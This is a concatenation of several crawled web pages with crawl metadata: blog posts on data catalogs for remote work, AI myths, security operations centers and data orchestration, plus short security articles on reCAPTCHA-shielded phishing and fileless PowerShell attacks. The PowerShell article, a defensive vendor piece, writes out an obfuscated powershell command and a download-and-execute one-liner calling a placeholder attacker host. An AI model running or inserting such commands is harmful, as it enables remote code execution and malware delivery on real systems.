endeavor as it is a technical process. Ideation and collaboration among multiple people with diverse perspectives and thinking styles are the keys to ideation and discovery of insights. It is a social process that can be greatly hindered by the social barriers working remotely creates. Finally, it is time to put the analysis to work—to devise strategies and tactics, to make decisions, and to take actions based on discoveries and insights from data. At this point the results of analysis are shared, and socialization is critical. The real power of data analytics is in the ways that it drives communications, conversations, and collective understanding. Bob Duniway, Assistant Vice President for University Planning at Seattle University, once said to me: “Business Intelligence doesn’t happen in computers. It happens between the ears and in the conversations between people.” That’s a powerful statement that emphasizes the futility of analytics without socialization. Clearly the social barriers of working remotely are as significant for information consumers as for information producers. Data informed decisions and actions are the goals of data analysis, but they are not the end of the story. With each insight, and with every decision and action come new questions and new analysis needs. Decision and action are the end of one analytics cycle and the beginning of another. Cycle time accelerates in times of turbulence and uncertainty. The Role of the Data Catalog Analytics speed and agility are essential for businesses to navigate successfully through the coming months. Collaboration, communication, knowledge sharing, and socialization are the keys to enable agile analytics. Across the entire data analysis cycle, data catalog capabilities fill important roles in analytics agility. (See figure 1.) The right data catalog used in the right ways will make a real difference in your organization’s capabilities for listening to the data and making data-informed decisions—critical capabilities to navigate the societal and economic uncertainties of the future. Give special attention to these guidelines to maximize the impact of data cataloging: - The catalog must support collaboration and crowdsourcing as well as communication, comments and reviews, and knowledge sharing about data. - The data catalog should be widely adopted and valued by data stakeholders. - The data catalog should be supported with formal data curation practices. - The data catalog should provide features and functions to catalog more than datasets. It should support cataloging and sharing of data preparation processes, reports, and analysis results. - The data catalog should support critical data governance needs such as identification and tagging of privacy sensitive data. And finally, two big “must have” items—these are more than guidelines. They are essentials for the data catalog as core business management technology. - The data catalog must recognize and integrate people as core elements of data ecosystems. - The data catalog must be an enterprise data catalog aware of all shared data regardless of locations and technologies. The current COVID-19 situation won’t last forever. But it will have long-term economic effects, and it may have lasting impact on the way that we work. Data and analytics become more important than ever as businesses make critical decisions to adapt and adjust to continuously changing conditions. It is likely that work-from-home, when no longer a mandate, will become a preferred option for many employers and employees. Serving data and analytics needs in a world of remote workers brings many new challenges. The data catalog has an important role in meeting those challenges.
<urn:uuid:1d298586-0e38-4e62-a509-57cb46dd3b48>
CC-MAIN-2022-40
https://www.alation.com/blog/supporting-remote-workers-with-a-data-catalog-in-the-wfh-era/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00534.warc.gz
en
0.933814
1,183
2.734375
3
Windows PowerShell is a powerful tool used by many administrators and users to automate and control many aspects of the Windows operating system. However, with such power comes great responsibility and the inevitable abuse by bad actors to infiltrate your device and infect it with malware is now a harsh reality. Fileless PowerShell attacks are now involved in nearly all new attack vectors. Attack vectors are getting more sophisticated every day. The significant increase in fileless PowerShell based attacks is on the rise, with 77% of successful attacks now using fileless exploits (Ponemon Institute) to evade traditional signature based AntiVirus (AV) software. Fileless PowerShell attacks are now the preferred weapon of choice for many of these attacks because it provides a number of techniques for bypassing existing security. Not least of all, the ability to run directly in memory and remotely download payloads. Most security products find fileless PowerShell attack vectors hard to stop because they cannot rely on signatures. Since the PowerShell is a core part of the operating system, can be easily obfuscated and bypasses application whitelisting, attack scripts can evade detection from most security software. We discuss some of the mechanisms employed by malware leveraging PowerShell scripts below. Privilege escalation is a common way malware is able to execute using the PowerShell command line. While the PowerShell is restricted from running scripts by default, most users / administrators re-enable this so they can use scripts in their daily activities or execute them at login. There are also several ways to bypass this restriction by using the “-command” argument. Another common technique is to bypass the execution policy directly by passing the “-executionpolicy bypass” command to PowerShell and execute the scripts directly. Obfuscation of PowerShell scripts takes many forms. Attacks essentially hide commands from security software through clever techniques such as encoding and escaping. For example a common technique is to escape the commands using backticks or carets such as the following: powershell.exe -c^o^m^m^a^n^d -F^i^l^e “script.ps1” Other techniques include the use of encoding to hide commands use base64 encoding, by using the “-encodedcommand” keyword on the command line. To avoid the problem, some organizations use blacklisting to block script execution entirely through Powershell.exe. However, there are many ways around this from an attackers perspective which do not require the PowerShell to be executed at all. Malware may execute alternative shells to execute their malicious scripts using custom built executables. Any security software needs to be able to detect such execution regardless of how it manifests on the endpoint. Exploit toolkits are now very prevalent such as PowerSploit and Mimikatz, to name but a few. These kits have been specifically designed to bypass and steal device and user credentials to execute more serious and lateral attacks within a network and used in a high proportion of fileless PowerShell attacks. Remote Download and Execution Remote code execution is another powerful technique employed by malware to remain undetected. Commands such as the following can be used to execute a remote script without ever touching the users machine. As such it is crucial that these techniques are prevented at the source. powershell.exe -command “iex(New-Object Net.WebClient).DownloadString(‘http://attacker.home/myscript.ps1’)” We have discussed many of the techniques used by fileless PowerShell scripts and commands, but how do they propagate within an organization? PowerShell scripts are normally used at the start of a new attack because they can go undetected. As such, they are most often used to launch a larger payload for an attack. They are most often encapsulated in email attachments with various extensions such as .wsf, .html, .pdf, .js or any office extension such as .pptx, xlsx etc. Another common method of propagation is within Office macros. This is a very specialized technique because the macro itself does not actually contain the code itself, but can present in metadata such as table cells. This executes the command directly, so any macro scanning would not detect problems. It is crucial that any security software is able to mitigate attacks through the PowerShell by stopping these and other important PowerShell attack points. At the same time it is important that legitimate PowerShell scripts are allowed to execute. BlackFog believes in a layered approach to security, stopping attacks at each point of the infection cycle. As such, the PowerShell is an important part of this approach and is enabled by default on all installations of BlackFog Privacy.
<urn:uuid:901bdd6a-0489-4431-a89e-31327cf16041>
CC-MAIN-2022-40
https://www.blackfog.com/fileless-powershell-protection/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00534.warc.gz
en
0.931318
973
2.53125
3
Cyber scammers are starting to use legitimate reCAPTCHA walls to disguise malicious content from email security systems, Barracuda Networks has observed. The reCAPTCHA walls prevent email security systems from blocking phishing attacks and make the phishing site more believable in the eyes of the user. reCAPTCHA walls are typically used to verify human users before allowing access to web content, thus sophisticated scammers are starting to use the Google-owned service to prevent automated URL analysis systems from accessing the actual content of phishing pages. Researchers observed that one email credential phishing campaign had sent out more than 128,000 emails to various organizations and employees using reCAPTCHA walls to conceal fake Microsoft login pages. The phishing emails used in this campaign claim that the user has received a voicemail message. Once the user solves the reCAPTCHA in this campaign, they are redirected to the actual phishing page, which spoofs the appearance of a common Microsoft login page. Unsuspecting users will be unaware that any login information they enter will be sent straight to the cyber scammers, who will likely use this information to hack into the real Microsoft account. Read more: Help Net Security
<urn:uuid:28ff7a6d-4754-445f-92c8-6ced012cf3cd>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/surge-in-phishing-attacks-using-legitimate-recaptcha-walls/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00534.warc.gz
en
0.88433
246
2.78125
3
All about rage, it’s all about rage to vogue!!! Vogue of a fascinating buzz Artificial Intelligence, a powerful technique, when blending with machine learning, augments the business decision-making process and provides a massive upgrade. “Artificial intelligence and machine learning, as a dominant discipline within AI, is an amazing tool. In and of itself, it’s not good or bad. It’s not a magic solution. It isn’t the core of the problems in the world.” — Vivienne Ming Artificial Intelligence is all the rage from self-driving cars and Siri & Alexa (personal assistants) to ML chatbots and scheduling email accomplices that will pick up regular duties out of human controls, but can AI replace humans? The answer is “Probably not”, it’s not as simple as it appears to be! In this quick tutorial, we will discuss the top five myths about Artificial Intelligence that newbies possess and also split the truth from fiction. So, let’s begin!!!!! Put simply, Artificial Intelligence(AI) is the potential of a machine or computer device to imitate human intelligence (cognitive process), learn from experiences, tailor to the recent information, and regulate humans-like-activities. In addition to that, AI conducts tasks intelligently that capitulates in producing massive efficiency, adaptability, and productivity for the complete system. It has a crucial flood of numerous applications incorporating NLP, healthcare, automotive, videos and gaming, speech recognition, finance and banking, digital marketing, computer vision, etc. But since no buzzing technology flourishes with rumors that especially wrapped up newbies perception about the technology, so as with our today’s trends the “Artificial Intelligence” (You may read our blog on ai in daily lives). The coming section describes those common misconceptions. Myths of AI Have you listened to “AI will automate entirety and remove people out of work”, “AI is totally a science-fiction based technology”, or “Robots will command the world”? This promotion around artificial intelligence has created several myths mainly in mainstream media (referring you to read the role of AI in media), board meetings, and over multiple organizations. Where some people are worried about AI that will control the world, and few also are thinking that AI is nothing than a buzzword, and the truth lies somewhere in between. “It is imperative that one should understand how AI could add value to various businesses and where it cannot”. It’s obvious to be misguided by the famous myths and misconceptions about the augmented technology. Below are a few myths about AI you must know in order to make better decisions about where to devote time and resources. Will AI take over humans across entire industries? Have you watched the movie “Terminator” in which machines were going to eradicate the complete human race, many similar movies are also there. On a similar note, people think one day another application of AI will remove the necessity of the human workforce across all the industries, this is nothing more than a hallucination. It is certainly true that the advent of AI and automation has the caliber to interrupt labor vigorously, even though in many conditions it is doing so, but this fact can be accounted straightforward as the transfer of labor(human) to machines is an ample understatement. Undoubtedly, AI has the power to acquire and generate more accurate outcomes than humans, but correspondingly AI requires humans to get relevant data in order to function better. So, up to what extent technology will go and delusions spark up, jobs and humans remain consistent. As we are talking about human and AI, have a glance at Human Augmentation. Can AI promptly outstrip and excel in human intelligence? Totally a misconception, brought in mind when AI is interpreted on a linear scale such as on a scale of one to ten human score the higher end, animal at the lower end, and the super-smart machines at the topmost of the scale. Now come out from this myth to reality, nothing like that. “Artificial intelligence would be the ultimate version of Google. The ultimate search engine would understand everything on the web. It would understand exactly what you wanted, and it would give you the right thing. We're nowhere near doing that now. However, we can get incrementally closer to that, and that is basically what we work on.” —Larry Page You might get amazed, actually, intelligence is calculated in several dimensions, even some features like calculation speed or memorizing capacity of computers are out of our reach. But other features like productive strength, emotional intelligence, and thinking approach are still somewhere in reach and aren’t acceptable to be soon, anytime. Common myths about Artificial Intelligence Does AI deployment urge a huge cost for desired outcomes? Now the other fallacy newbies have is that implementation of AI is money demanding for delivery desired outcomes, even though not only that, it also demands data scientists, machine learning experts, data engineers along with huge investment. Some AI applications do need data scientists or computer programing experts for building sophisticated techniques only at one end of the technology spectrum that obviously also require money but not at large scale and produce results to add value to businesses. Due to the growing number of accessible business tools and software, many organizations opt for these AI business applications where no such experts required. Can AI evaluate any sort of complex data on its own? Are you thinking like you would feed AI with some random, unstructured data and AI will find an automated solution, you probably met the wrong thought? Worthwhile, there is a need for accurate and appropriate data for AI to process and analyze it that can yield desirable results. Moreover, AI experts keep operating data iteration and monitoring constantly on the learning process of AI in order to make the best algorithm out of rest in terms of best-suitable for the business need. Can AI be made bias-free? With the engagement of AI, now computers are controlling all the tasks that lead to eliminating the biases from the system as if only simple up to that mark. Due to the human input required for the AI, it would be intrinsically biased, more specifically, to assure diversity amid the teams working with AI and the team members analyzing the work of each other, and combining these two steps together can essentially decrease selection and confirmation bias. For instance, in one case study, ProPublica found a program (AI algorithm) that incorrectly rated whites accused as low-risk regularly as compared to black accused, that’s wrong and completely biased. At certain points, instead of considering fishy myths, one should believe in the strength of AI that aids in transforming improved decision making. Each company usually encounters the intercepting and dealing with essence customer service while examining the newest strategies to augment efficiency and potency to the business. “Some people worry that artificial intelligence will make us feel inferior, but then, anybody in his right mind should have an inferiority complex every time he looks at a flower.” —Alan Kay In the digital era that is equipped with advanced technology, we are already working with such technology under the shed of Artificial Intelligence. For more learning and to become a pro, stay tuned with AI that transfers augmentation to the next level.
<urn:uuid:8ec30a0a-4d48-4981-bb7c-d883d9f9e6cc>
CC-MAIN-2022-40
https://www.analyticssteps.com/blogs/top-5-myths-about-artificial-intelligence
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00534.warc.gz
en
0.944398
1,541
2.59375
3
With the number and sophistication of cyberattacks growing, some of these messages require urgent attention. But which ones? That’s where a security operations center (SOC) comes in. What is a security operations center? A security operations center (SOC) is a central location that an IT security team uses to monitor and analyze an organization’s security posture and operations. The SOC is responsible for the ongoing, operational component of enterprise information security. The SOC team’s goal is to detect, analyze, and respond to anomalies and potential cybersecurity incidents using a combination of technologies and processes. Staffers work closely with organizational incident response teams to ensure that security issues are addressed quickly upon discovery. Risk assessments, coordination and communication are key functions to ensure the supporting groups have accurate information on current risk status. An SOC, then, provides information about the infrastructure that manages security operations. It offers continuous prevention and protection, detection of threats, and response capabilities to deal with any potential security issues. The benefits of an SOC include: - Rapid response times to deal with malware threats that can spread in minutes - The ability to recover quickly from a malicious attack such as DDoS - Real-time monitoring - Log aggregation - Centralized reporting - Visualization of security status - Post-incident investigation and analysis SOC vs NOC A network operations team (NOC) can sometimes be confused with an SOC. Both the SOC and NOC are responsible for identifying, investigating, prioritizing, escalating and resolving issues. However, the types of issues they deal with differ considerably. Both look for and address anomalies. There may even be some crossover – various anomalies can affect both the network side and the security side. But the main difference between them is simply that the SOC is security-focused and the NOC is focused on network performance and availability. During an outage, for example, those in the NOC think in terms of device malfunctions or system issues. Their attempts at resolution are likely to include hardware replacement or configuration adjustment. SOC personnel, on the other hand, think more in terms of malicious activity. Organizations need both viewpoints. Global SOC vs traditional SOC A traditional security operations center and a global SOC are essentially the same thing. However, there is a difference in scope. Some companies are only interested in their own immediate vicinity, while others monitor global operations. Further, global SOCs typically command several smaller SOCs under them. After all, global SOCs can manage better by delegating duties to local counterparts who can zero in on events happening within a clearly defined area. It is much easier to manage the actions of a security operations team by concentrating their attention on a smaller sector. With the advent of the cloud and the need for cloud security, it is no longer essential for an SOC to be in one physical location. Some organizations, of course, maintain their SOC team and supporting infrastructure in one central place. But service providers are now starting to provide SOC-as-a-Service. In addition, even those companies that try to keep all of their SOC functions strictly in house tend to have at least some part of their environment in the cloud. “Many of the tools or systems being monitored are hosted in the cloud regardless of the terminology used to define the SOC,” said Ray Chaple, CISSP, Information Security Officer at security training vendor KnowBe4. Designing and building a security operations center The design of an SOC is determined by its requirements and overall scope. While SIEM may be central to an SOC as a means of aggregating and analyze security information, the tools and platforms deployed will be specific to the environment. Consideration should be given to factors such as network bandwidth, incident response capabilities (automated and manual) and analytical capabilities. A good early step in designing an SOC is an audit of existing security procedures. This provides planners with the actual picture as it exists on the ground. Planning should also include choice of location, resources needed, budgeting and training. However, plans will change as the SOC is being developed. It is almost impossible to prepare for everything in advance. Those that think they have covered every possible eventuality are going to be blindsided by such factors as an entirely new attack vector, or a part of the infrastructure that is poorly protected or unprotected. So don’t fall for the conceit that everything has been planned and designed perfectly. There is always room for improvement, and the threat landscape is constantly evolving. What is important is to evolve with it, and to be flexible in the planning and construction of an SOC. Another part of planning is to define the specific tasks to be assigned to the SOC. This should include detecting external attacks, monitoring organizational compliance, checking for insider threats or non-compliance, managing incidents, and more. Also define how data will be collected, aggregated, centralized, summarized, analyzed and visualized for best effect. The different user groups that access the data will have certain requirements that have to be considered during the design stage. There are several kinds of SOCs, as well as hybrids that share some of the qualities of each: - Virtual SOC: no dedicated facility, geographically distributed team members, and often delegated to a managed service provider - Combined SOC/NOC: One team and facility is dedicated to shared network and security monitoring - Dedicated SOC: An in-house, dedicated facility - Global or Command SOC: monitors a wide area that encompasses many other regional SOCs Smaller organizations may get away with outsourced security operations centers. A hybrid model that combines a virtual SOC with some internal SOC duties is likely to be deployed by some small and midsize organizations, particularly those already outsourcing some security functions and are budget-constrained or have yet to develop a sufficiently competent set of internal personnel to carry the load. Technologies needed in an SOC Security operations centers depend upon or interact with a wide range of security technologies such as: - Security event monitoring, detection, investigation and remediation - Intrusion prevention and detection systems - Security incident response management - Forensic analysis - Endpoint protection - Threat intelligence tools - Threat hunting tools - Security device management - Threat and vulnerability management - Compliance management and reporting - Behavioral analytics - Traffic analysis - Security orchestration and automation - Attack simulation SIEM systems encompass some, though not all, of these functions. To confuse matters further, vendors are packaging more and more security tools together into larger suites. Some retain the SIEM tag while others have grander names. Chaple stressed that the technologies deployed will depend on the scope and requirements of the SOC. “Some type of SIEM is the core data aggregation component that most all SOCs have,” said Chaple. “Other key areas or tools to consider include asset discovery, vulnerability assessment & pen testing, logging, monitoring & reporting, anomaly detection, intrusion detection, data analytics, and threat intelligence.” SOC management and staff SOCs are managed in various ways depending on the existing organizational structure. Typically, the SOC manager reports to the CISO or another C-level executive such as the CTO or CIO. The SOC manager can have various roles and responsibilities under him or her. This includes those who respond to incidents after they have happened, those who analyze the general threat landscape, those who hunt down threat actors, and more. Here are a few of the primary personnel functions: - SOC manager: takes care of personnel, budgets, technology strategy, meeting SLAs and communication with the CISO - SOC analyst: monitors the state of alerts, drills down to find the cause, advises on remediation and determines actions to take to further harden defenses - Threat hunter: works proactively to track down avenues of potential attack, isolates new incursions before alerts are received, and detects the presence of malicious actors lying dormant within the network but ready to act in the future.
<urn:uuid:876ead6d-1134-45b8-b954-e7ca23b6eada>
CC-MAIN-2022-40
https://www.esecurityplanet.com/networks/soc-best-practices/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00534.warc.gz
en
0.947331
1,652
2.953125
3
The number of data collection points for businesses of all sizes and in all industries is rapidly increasing. Unfortunately, the networks and workflows that previously functioned well with smaller data streams are now overwhelmed with too much data. Often, the data is in different formats, and the organizations collecting the data have no formal strategy for handling it. This disorganization can result in: - Data swamps: Vast lakes of siloed data – some of which may be useful but much of which isn’t – clog up data processes, cost money for storage, and grow bigger the longer they’re ignored. - Lost developer time: More data means more time is spent cleaning and processing it; those in the field find that 80% of their time is spent acquiring and preparing data. - Slowed business insight velocity: The more data there is, the longer it takes to put it into a usable format. This means it takes longer for quality data to reach the people it needs to. - Regulatory Infraction: With stronger laws on data governance and usage, data collectors need to be able to locate specific user data and prove it’s only being used for what they have permission for. Otherwise, they risk considerable fines and reputational damage. - Opportunity costs: Storing data costs money, as does employing data scientists and developers. But, there’s another cost that could be even bigger. By being too slow to use the data they’ve already collected, organizations miss out on considerable efficiencies or revenue streams that could make a big difference to their bottom line. The solution to the above issues is building a data orchestration framework that automatically processes data as it’s collected and delivers it in usable formats. But what is data orchestration exactly? Let’s take a closer look. What is data orchestration? Data orchestration is the use of combined tasks and automated processes to bring together data from dispersed silos and data collection points, combine it, and deliver it directly to those who need it. Since all the time spent acquiring and preparing processes is done automatically by a data orchestration platform, data can flow much quicker through an organization. In addition, all of an organization’s storage systems can be interconnected and the data flowing between them can be orchestrated to deliver a smooth and more time-efficient data processing operation. How does data orchestration work? Standard data processes relied on a task list being physically set by a data function, whereas data orchestration uses DAGs (directed acyclic graphs) to automatically sort collected data. These are complicated task chains that ask and answer a series of questions about what should be happening with data as it’s ingested. DAGs sort data at great speed, subsequently organizing it into very precise and easy-to-use categories. With these extensive task flows running as automated processes, all the data an organization collects goes straight to where it’s supposed to without getting stuck in an intermediary, and all too often permanent, data swamp. This orchestrated data is then available for data analysis tools in uniform, readily usable formats. For most data orchestration deployments, AI or machine learning is also integrated into the platform in order to react to and handle all new data inflows, even if not formally specified in the DAG. The advantages of data orchestration Once you’ve established what is data orchestration about thenthe numerous advantages to it become more apparent. As data collection grows, it is the only solution for bridging the current gaps between the collection, storage, analysis, and use of data. While the best solution is to incorporate a data orchestration framework from the very beginning, the only viable solution for nearly all enterprises is to deploy a data orchestration platform. Data orchestration platforms and tools can help organizations with: - Data cleansing: Data orchestration tools can remove unnecessary metadata or data that has been predetermined as unneeded. - Data interoperability: Data can arrive in many different formats, which slows down data analysis. A data orchestration solution can ensure that all data arrives in uniform formats. - Data organization: Data swamps grow because data is not labeled and organized properly when first ingested. Data orchestration ensures that all data has very clear annotation, which makes it easily and quickly accessible in the future. - Faster insights: Data orchestration funnels data insights directly to the business functions that need them. - Data governance: Data orchestration allows organizations to place access and identity management controls over data, including what it can be used for and by whom. It also allows audit trails to be created by establishing usage logs of the data involved. - Future proofing data infrastructure: One of the biggest benefits of deploying data orchestration is that it prevents data lakes from becoming too large and unmanageable. It also puts in place a framework that can easily scale to handle all future data collection and organization. What is Data orchestration with Intertrust Platform like? Intertrust Platform is a secure data platform that helps organizations orchestrate their data to provide quicker and more meaningful insights into their business operations. The Platform uses a virtualized data layer to bring together the data that’s needed for analysis in secure execution containers. That way, data can be accessed and used wherever it is without the need for migration. Data governance is also enhanced through fine-grained access control of all data brought together through the Platform. This facilitates secure collaboration with other organizations and the use of third-party analytics, as organizations no longer have to worry about data regulatory issues. If you would like to find the answer to what is data orchestration from the experts and learn more about how Intertrust Platform helps companies orchestrate their data and maximize its value while lowering costs, read more here or talk to our team. About Abhishek Prabhakar Abhishek Prabhakar is a Senior Manager ( Marketing Strategy and Product Planning ) at Intertrust Technologies Corporation, and is primarily involved in the global product marketing and planning function for The Intertrust Platform. He has extensive experience in the field of new age enterprise transformation technologies and is actively involved in market research and strategic partnerships in the field.
<urn:uuid:b8c7e8fd-fa11-4fc7-a9ba-e0028aaff17f>
CC-MAIN-2022-40
https://www.intertrust.com/blog/your-guide-to-data-orchestration/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00534.warc.gz
en
0.927908
1,278
2.765625
3